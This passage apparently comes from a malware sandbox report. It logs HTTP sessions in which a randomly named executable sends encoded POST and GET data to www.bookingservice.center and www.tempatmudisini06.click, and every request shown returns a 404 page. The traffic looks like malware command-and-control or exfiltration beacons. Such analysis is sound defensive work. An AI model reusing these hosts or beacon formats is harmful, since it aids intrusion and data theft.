                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                Jan 11, 2025 05:10:29.897244930 CET218INData Raw: 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e
                                                                Data Ascii: <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.74997798.124.224.1780360C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 05:10:31.933536053 CET752OUTPOST /47f1/ HTTP/1.1
                                                                Host: www.bookingservice.center
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.bookingservice.center
                                                                Content-Length: 239
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.bookingservice.center/47f1/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Raw: 2d 4a 6b 70 34 66 3d 4d 4d 66 73 53 74 61 41 77 79 31 44 68 33 44 53 33 56 4b 56 32 4f 67 4e 75 2f 70 6f 50 72 43 73 79 75 53 56 53 75 65 66 45 4c 65 6e 66 61 77 4a 76 37 49 35 48 30 67 67 38 6f 50 35 54 58 78 4b 51 2f 37 79 37 2f 2f 42 4d 66 78 68 47 72 4d 30 44 7a 74 79 72 56 49 4b 6e 6e 59 45 69 41 53 77 2b 4a 4d 52 5a 30 6c 6d 4f 43 64 63 6d 61 45 72 39 46 39 44 4b 30 45 63 64 6f 61 39 68 59 57 4c 78 58 6a 75 7a 2b 73 47 54 6b 53 73 69 54 44 31 4a 34 72 76 68 64 74 70 6b 31 42 4a 77 71 6a 62 57 4a 55 70 50 37 59 69 32 51 63 37 6a 57 56 79 2b 2b 66 56 66 6c 43 59 62 61 45 79 47 69 46 30 42 70 32 75 34 2b 2b 7a 6b 66 69 42 71 74 66 54 75 62 69 49 2b 63 4a 43 56 7a 70 4d 42 52 73 6f 66 43 67 43 52 64 63 3d
                                                                Data Ascii: -Jkp4f=MMfsStaAwy1Dh3DS3VKV2OgNu/poPrCsyuSVSuefELenfawJv7I5H0gg8oP5TXxKQ/7y7//BMfxhGrM0DztyrVIKnnYEiASw+JMRZ0lmOCdcmaEr9F9DK0Ecdoa9hYWLxXjuz+sGTkSsiTD1J4rvhdtpk1BJwqjbWJUpP7Yi2Qc7jWVy++fVflCYbaEyGiF0Bp2u4++zkfiBqtfTubiI+cJCVzpMBRsofCgCRdc=
                                                                Jan 11, 2025 05:10:32.449974060 CET1236INHTTP/1.1 404 Not Found
                                                                Content-Type: text/html
                                                                Server: Microsoft-IIS/10.0
                                                                X-Powered-By: ASP.NET
                                                                X-Frame-Options: SAMEORIGIN
                                                                Date: Sat, 11 Jan 2025 04:10:31 GMT
                                                                Connection: close
                                                                Content-Length: 1245
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                Jan 11, 2025 05:10:32.450020075 CET218INData Raw: 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e
                                                                Data Ascii: <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.74997898.124.224.1780360C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 05:10:34.474505901 CET1765OUTPOST /47f1/ HTTP/1.1
                                                                Host: www.bookingservice.center
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.bookingservice.center
                                                                Content-Length: 1251
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.bookingservice.center/47f1/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Raw: 2d 4a 6b 70 34 66 3d 4d 4d 66 73 53 74 61 41 77 79 31 44 68 33 44 53 33 56 4b 56 32 4f 67 4e 75 2f 70 6f 50 72 43 73 79 75 53 56 53 75 65 66 45 4c 47 6e 66 76 6b 4a 39 4d 6b 35 41 30 67 67 2f 6f 50 38 54 58 78 74 51 2f 44 4d 37 2f 43 38 4d 64 5a 68 58 35 30 30 54 42 4a 79 78 46 49 4b 6f 48 59 2f 2f 51 53 66 2b 49 38 56 5a 30 31 6d 4f 43 64 63 6d 63 6f 72 30 30 39 44 4d 30 45 66 63 6f 61 70 6c 59 57 76 78 58 37 2b 7a 2b 34 57 54 56 75 73 69 79 7a 31 4c 4b 54 76 70 64 74 72 6e 31 41 4f 77 72 66 36 57 4a 59 66 50 37 38 63 32 58 51 37 6e 78 51 56 74 4e 48 57 4e 32 79 56 48 70 30 72 50 68 46 2b 59 66 6e 57 36 50 75 71 6c 50 2f 38 79 50 33 4a 34 39 76 52 6a 65 78 6a 4e 32 31 76 42 42 4e 43 41 6a 73 36 44 5a 6d 30 2f 6c 7a 4f 4a 52 33 44 6d 4b 53 7a 39 44 39 5a 63 61 4f 78 54 45 51 6c 30 53 6f 54 62 43 56 7a 32 65 66 4a 6e 67 34 75 45 4e 77 6b 62 78 48 2b 36 33 72 41 31 37 50 59 57 33 55 56 37 78 49 71 48 45 44 55 74 46 47 68 53 30 2b 63 46 4a 43 2f 39 4c 44 72 75 69 43 6e 42 4b 7a 4b 48 4b 36 4d 6a 45 32 [TRUNCATED]
                                                                Data Ascii: -Jkp4f=MMfsStaAwy1Dh3DS3VKV2OgNu/poPrCsyuSVSuefELGnfvkJ9Mk5A0gg/oP8TXxtQ/DM7/C8MdZhX500TBJyxFIKoHY//QSf+I8VZ01mOCdcmcor009DM0EfcoaplYWvxX7+z+4WTVusiyz1LKTvpdtrn1AOwrf6WJYfP78c2XQ7nxQVtNHWN2yVHp0rPhF+YfnW6PuqlP/8yP3J49vRjexjN21vBBNCAjs6DZm0/lzOJR3DmKSz9D9ZcaOxTEQl0SoTbCVz2efJng4uENwkbxH+63rA17PYW3UV7xIqHEDUtFGhS0+cFJC/9LDruiCnBKzKHK6MjE2epC0rhoYOG74r8pl9LhdRjOTTY/9AuI3cCz6oDBIu2vQFBItxzaH/7A1fu1RjkVaiXEslaG6lAzMJ24V7TW+N1yEGgijrteF6aq/BsgkJyidCtsui/0KYh/vJn6Vu73Ka1dBX/uVk8e80pEVO++AYMy4FziFxV32cJVK43oJdFhy1zOOd23eDWRgteyv013qE6a66kvRn4GQqrIYJCxd2nDzh2Iozu/gUcPq0JDIFZfFH6NE2NbgT8MLIdf7+CCNiuzKppdu3kIE0tdXBxwhD0bp+WSWAHJhF16NngEtIVFHQ4wweSL7p77iiWIAUSGyQGlohRMiIp/6dV70BnCrHucSBq5f7EbACkLs6/SSPdIOu9yBR2xnKGsybYU1YPqQe5jEwoG4oDzrxM0isMX2vRAPJe5GYf8qE3+7PsPK5ZMFkOhQvrNz/xhQw54NyQf3EyxaAVNljvi72Wz0tndBfiWv1mKEit1qTcbtTWqnKJYio92LZ50NccRolhaHEcxzPOuo51cqTBZBZpaQ5+hVGH8WxEh8EKLWTJzX/yqgLQqJMM9JEUgjZ1dcAbwqfOoxmZBCIc3N1OKYFvfMqi72EyJE0bF1ChLhRGPVam1gT7vHgi8dtvqLGWBY5xIPU3SxfrWQEsfdkITo1LsWVfW3GEnpU5gE/fX3Dw [TRUNCATED]
                                                                Jan 11, 2025 05:10:34.983858109 CET1236INHTTP/1.1 404 Not Found
                                                                Content-Type: text/html
                                                                Server: Microsoft-IIS/10.0
                                                                X-Powered-By: ASP.NET
                                                                X-Frame-Options: SAMEORIGIN
                                                                Date: Sat, 11 Jan 2025 04:10:34 GMT
                                                                Connection: close
                                                                Content-Length: 1245
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                Jan 11, 2025 05:10:34.983899117 CET218INData Raw: 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e
                                                                Data Ascii: <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.74997998.124.224.1780360C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 05:10:37.015678883 CET458OUTGET /47f1/?-Jkp4f=BO3MRbup7BgeiGzbrkvG8KshvKs5D/C7iISXRLSPWIyfeIsyuuk5G38k05LUc3hMRb3xwauQUaAEJYhYNzVT7FZPnmIkgRyT2IIjZ1tDFAd1kYY85WNZHG4rc4iGu4bn6UDT+t8IWznL&SVjx=u6ApldVh4TiTWl HTTP/1.1
                                                                Host: www.bookingservice.center
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Language: en-US,en;q=0.9
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Jan 11, 2025 05:10:37.532408953 CET1236INHTTP/1.1 404 Not Found
                                                                Content-Type: text/html
                                                                Server: Microsoft-IIS/10.0
                                                                X-Powered-By: ASP.NET
                                                                X-Frame-Options: SAMEORIGIN
                                                                Date: Sat, 11 Jan 2025 04:10:36 GMT
                                                                Connection: close
                                                                Content-Length: 1245
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                Jan 11, 2025 05:10:37.532457113 CET218INData Raw: 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e
                                                                Data Ascii: <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.749981103.21.221.480360C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 05:10:42.828474045 CET735OUTPOST /4iun/ HTTP/1.1
                                                                Host: www.tempatmudisini06.click
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.tempatmudisini06.click
                                                                Content-Length: 219
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.tempatmudisini06.click/4iun/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Raw: 2d 4a 6b 70 34 66 3d 62 54 67 4c 56 73 43 36 5a 34 79 59 54 2b 52 6e 4f 6a 78 4a 50 70 33 77 4a 52 68 42 72 57 37 30 6a 6c 37 47 57 5a 48 6c 79 62 6e 49 45 31 66 68 2b 35 31 49 70 56 79 6a 38 4f 6a 79 44 49 47 56 53 42 79 32 31 79 55 2f 70 44 6e 77 6f 78 73 43 74 52 38 66 68 39 61 78 4b 63 4e 52 65 4a 72 36 6e 64 50 63 74 38 47 56 75 6c 48 54 54 37 64 6c 69 48 4e 6d 2b 30 44 76 62 4d 7a 50 35 46 7a 66 55 6e 65 46 75 2b 59 51 37 4f 51 54 7a 57 79 65 77 55 6f 2f 6c 2b 31 78 6d 30 36 47 62 4d 59 7a 6b 56 7a 5a 7a 33 64 50 56 43 46 58 39 55 54 70 7a 6d 65 6e 6c 74 2f 54 77 65 78 57 5a 6a 4c 5a 6c 55 43 32 73 6e 71 4f 64 73 55 57 42 43 6e 30 38 67 3d 3d
                                                                Data Ascii: -Jkp4f=bTgLVsC6Z4yYT+RnOjxJPp3wJRhBrW70jl7GWZHlybnIE1fh+51IpVyj8OjyDIGVSBy21yU/pDnwoxsCtR8fh9axKcNReJr6ndPct8GVulHTT7dliHNm+0DvbMzP5FzfUneFu+YQ7OQTzWyewUo/l+1xm06GbMYzkVzZz3dPVCFX9UTpzmenlt/TwexWZjLZlUC2snqOdsUWBCn08g==
                                                                Jan 11, 2025 05:10:43.716552019 CET1033INHTTP/1.1 404 Not Found
                                                                Connection: close
                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                pragma: no-cache
                                                                content-type: text/html
                                                                content-length: 796
                                                                date: Sat, 11 Jan 2025 04:10:43 GMT
                                                                server: LiteSpeed
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.749982103.21.221.480360C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 05:10:45.379293919 CET755OUTPOST /4iun/ HTTP/1.1
                                                                Host: www.tempatmudisini06.click
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.tempatmudisini06.click
                                                                Content-Length: 239
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.tempatmudisini06.click/4iun/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Raw: 2d 4a 6b 70 34 66 3d 62 54 67 4c 56 73 43 36 5a 34 79 59 51 65 42 6e 4d 45 64 4a 49 4a 33 78 58 68 68 42 69 32 37 77 6a 6b 48 47 57 59 43 34 79 4a 44 49 46 52 50 68 2f 34 31 49 6c 31 79 6a 33 75 6a 33 65 34 47 6b 53 42 2b 2b 31 33 30 2f 70 44 7a 77 6f 78 38 43 75 6d 49 59 67 74 61 4a 48 38 4e 58 51 70 72 36 6e 64 50 63 74 39 69 7a 75 6b 76 54 54 4c 4e 6c 69 6d 4e 6c 32 55 44 6f 4c 63 7a 50 76 31 7a 54 55 6e 66 53 75 37 42 59 37 4e 6f 54 7a 57 43 65 77 46 6f 34 71 2b 31 4e 6f 55 37 4c 63 2f 35 58 71 6e 4b 68 30 6d 59 55 4d 44 4a 73 31 43 53 4c 70 45 53 4c 37 38 48 6f 30 63 56 67 4f 46 57 73 6e 56 47 75 68 46 65 76 43 62 78 38 4d 51 47 77 71 62 41 59 49 32 4e 32 78 65 2f 5a 30 77 79 6a 42 6e 37 62 4a 52 6f 3d
                                                                Data Ascii: -Jkp4f=bTgLVsC6Z4yYQeBnMEdJIJ3xXhhBi27wjkHGWYC4yJDIFRPh/41Il1yj3uj3e4GkSB++130/pDzwox8CumIYgtaJH8NXQpr6ndPct9izukvTTLNlimNl2UDoLczPv1zTUnfSu7BY7NoTzWCewFo4q+1NoU7Lc/5XqnKh0mYUMDJs1CSLpESL78Ho0cVgOFWsnVGuhFevCbx8MQGwqbAYI2N2xe/Z0wyjBn7bJRo=
                                                                Jan 11, 2025 05:10:46.260484934 CET1033INHTTP/1.1 404 Not Found
                                                                Connection: close
